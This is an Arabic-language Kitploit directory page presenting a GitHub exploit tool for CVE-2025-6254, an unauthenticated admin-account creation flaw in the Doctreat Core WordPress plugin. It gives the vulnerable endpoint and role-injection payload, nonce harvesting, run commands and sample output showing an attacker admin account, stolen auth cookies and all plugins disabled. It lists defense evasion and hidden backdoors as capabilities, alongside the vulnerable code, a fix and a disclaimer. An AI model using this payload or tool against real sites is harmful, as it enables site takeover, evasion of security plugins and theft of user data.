Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6254 — CVE-2025-6254 — Doctreat Core <= 1.6.8 — تصعيد امتيازات غير مصادق عليه | Kitploit
أدوات/GitHubGitHub/yucaerin/cve-2025-6254
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمر
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
yucaerin/cve-2025-6254

CVE-2025-6254

CVE-2025-6254 — Doctreat Core <= 1.6.8 — تصعيد امتيازات غير مصادق عليه

عرض المستودع

CVE-2025-6254 — Doctreat Core <= 1.6.8 — تصعيد الامتيازات غير المصادق عليه عبر حقن الدور

🔥 ملخص الثغرة

إضافة ووردبريس Doctreat Core الإصدارات <= 1.6.8 معرّضة لثغرة تصعيد امتيازات غير مصادق عليه. تسمح هذه الثغرة الحرجة لـالمهاجمين غير المصادق عليهم بإنشاء حساب مسؤول جديد مباشرة عبر نقطة نهاية AJAX الخاصة بتسجيل الإضافة.

تنبع الثغرة من دالة doctreat_process_registration() في hooks/hooks.php، والتي تقبل معامل user_type مباشرة من بيانات POST المرسلة من المستخدم وتمرّره كمعامل role إلى wp_update_user() دون تفويض مناسب أو تحقق من قائمة الأدوار المسموحة. تطبّق الإضافة فقط دالة esc_sql() (التي لا تتحقق من الأدوار) — ولا تتحقق أبدًا مما إذا كان الدور آمنًا للتسجيل العام.

اكتشاف بارز: الـ nonce الذي تستخدمه Doctreat (scripts_vars.ajax_nonce) مكشوف في أي صفحة عامة من قالب Doctreat النشط. يمكن تجاوز معامل user_type، الذي يتحكم عادةً فيما إذا كان المستخدم يسجّل كـ"doctors" أو "hospitals" أو "regular_users"، عبر POST بقيمة user_type=administrator — ويتم تمرير هذه القيمة مباشرة كمعامل role في ووردبريس.

🔍 الإضافة المتأثرة

  • اسم الإضافة: Doctreat Core
  • الإصدار المتأثر: <= 1.6.8
  • نوع الثغرة: تصعيد الامتيازات غير المصادق عليه عبر حقن الدور
  • معرف CVE: CVE-2025-6254
  • درجة CVSS: 9.8 (حرجة)
  • CWE: CWE-269 — إدارة امتيازات غير سليمة
  • التأثير: سيطرة كاملة على الموقع — إنشاء حساب مسؤول

🧨 ما يمكن للمهاجمين فعله

🧪 ميزات الاستغلال

  • 🔓 لا يتطلب مصادقة
  • 📝 يعمل عبر نقطة نهاية AJAX الخاصة بالتسجيل
  • 🎯 يستهدف نقطة نهاية AJAX /wp-admin/admin-ajax.php?action=doctreat_process_registration
  • 🧠 حقن الدور — يرسل user_type=administrator مع حقول التسجيل العادية
  • 🌐 استخراج تلقائي للـ nonce — يستخرج ajax_nonce من الصفحات العامة لقالب Doctreat
  • 🔐 يتجاوز التحقق من الـ nonce — يستخدم nonce شرعيًا مكشوفًا في سكربتات القالب
  • 🔗 يكتشف تلقائيًا http/https — لا حاجة لتحديد البروتوكول
  • 🔒 دعم SSL غير الآمن — يعمل مع الشهادات ذاتية التوقيع/غير الصالحة
  • 🎛️ تعطيل جميع الإضافات تلقائيًا — 3 طرق: إجراء جماعي عبر plugins.php، وREST API، وadmin-ajax.php
  • 🍪 استخراج الكوكيز — يخرج كوكيز مصادقة ووردبريس لاستخدامها في المتصفح/curl
  • 🧠 سكربت وحدة تحكم جافاسكربت — الصقه في DevTools بالمتصفح للحصول الفوري على وصول كمسؤول

🧠 الكود المعرّض للثغرة

root@kitploit:~
// doctreat_core/hooks/hooks.php ~ line 296
wp_update_user( array(
    'ID' => esc_sql( $user_identity ),
    'role' => esc_sql( $user_type ),  // ← user_type from $_POST via extract($_POST)
    'user_status' => 0
) );
root@kitploit:~
// ~ line 311 — Sets _is_verified after registration
update_user_meta( $user_identity, '_is_verified', 'no' );

ملاحظة: في الأهداف ذات إعدادات التحقق الافتراضية ($verify_user فارغة أو 'remove')، يتم التحقق من المستخدم تلقائيًا ويحصل فورًا على وصول كمسؤول. أما الأهداف التي يتطلب التحقق فيها تفعيل التحقق عبر البريد الإلكتروني أو موافقة المسؤول فستتطلب خطوات تحقق إضافية.

🚀 الاستخدام

root@kitploit:~
python3 CVE-2025-6254_exploit.py target.com
python3 CVE-2025-6254_exploit.py https://target.com
python3 CVE-2025-6254_exploit.py http://target.com:8080

تسجيل الدخول ببيانات اعتماد موجودة (الحصول على الكوكيز)

root@kitploit:~
python3 CVE-2025-6254_exploit.py target.com username password

مثال على المخرجات الكاملة

root@kitploit:~
============================================================
CVE-2025-6254 PoC - Doctreat Core Privilege Escalation
============================================================
[*] Target: https://target.com
[+] Found nonce from https://target.com/: abc123xyz
[*] Sending registration request...
[*] Username: hackeradmin1234
[*] Role: administrator

[+] EXPLOIT SUCCESSFUL!
[+] Username: hackeradmin1234
[+] Password: Password@1234!
[+] Email: [email protected]
[+] Role: ADMINISTRATOR

[*] Attempting to login and extract cookies...
[*] Trying Doctreat admin-ajax.php login...
[*] AJAX login status: 200
[*] AJAX login response: {"type":"success","loggedin":true,...}

[+] LOGIN SUCCESSFUL! AUTH COOKIES EXTRACTED!
[+] JAVASCRIPT CONSOLE SCRIPT (COPY & PASTE):
// Paste this in browser DevTools console for instant admin access

[*] PHASE 2: AUTO-DISABLE ALL PLUGINS (PYTHON)
[*] Fetching plugin list from: https://target.com/wp-admin/plugins.php
[+] Found nonce: def456uvw
[+] Found 15 active plugins
[*] Disabling all plugins via bulk action...
[+] ALL PLUGINS DISABLED SUCCESSFULLY!

سكربت وحدة تحكم جافاسكربت

بعد تشغيل الاستغلال، انسخ كود الجافاسكربت المُنشأ والصقه في وحدة تحكم DevTools بالمتصفح (F12):

root@kitploit:~
(function() {
    'use strict';
    console.log('[*] Starting WordPress admin access...');
    // ... cookies set automatically ...
    window.location.href = 'https://target.com/wp-admin/';
})();

المتطلبات

  • Python 3.6+
  • مكتبة requests (pip install requests)
  • يجب أن يتوفر في الهدف:
    • قالب Doctreat نشط (لاستخراج الـ nonce)
    • إضافة Doctreat Core بإصدار <= 1.6.8 مفعّلة
    • تسجيل المستخدمين مفعّل

🛠 توصيات الإصلاح

root@kitploit:~
// SECURE: Allowlist only safe roles for public registration
$allowed_roles = array('doctors', 'hospitals', 'regular_users', 'seller');
if (!in_array($user_type, $allowed_roles, true)) {
    $user_type = 'regular_users';  // ← Reject ALL dangerous roles
}
  • تنفيذ قائمة أدوار مسموحة صارمة للتسجيل
  • إضافة فحوصات current_user_can('create_users') للصلاحيات المميزة
  • التحقق من user_type قبل تمريره إلى wp_update_user()
  • النظر في إزالة تعيين الأدوار من التسجيل العام تمامًا

🧠 الباحث

  • الإسناد: Friderika Baranyai (Foxyyy)

📚 المراجع

  • استشارة Wordfence

🔒 إخلاء المسؤولية

تُقدَّم هذه المعلومات لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستغلال غير المصرح به لأنظمة الكمبيوتر غير قانوني وغير أخلاقي. احصل دائمًا على إذن كتابي صريح قبل اختبار أي هدف لا تملكه.

تنزيل الأداة
القدرةالتأثير
🔑 إنشاء حساب مسؤول بدون تسجيل دخولسيطرة كاملة على الموقع
🎛️ تعطيل جميع الإضافات الأمنية تلقائيًاالتهرب من الدفاعات
💉 تعديل ملفات PHP للإضافات/القوالبتنفيذ كود عن بُعد
🕳️ تثبيت أبواب خلفية مخفيةوصول دائم
👥 عرض جميع بيانات المستخدمينانتهاك الخصوصية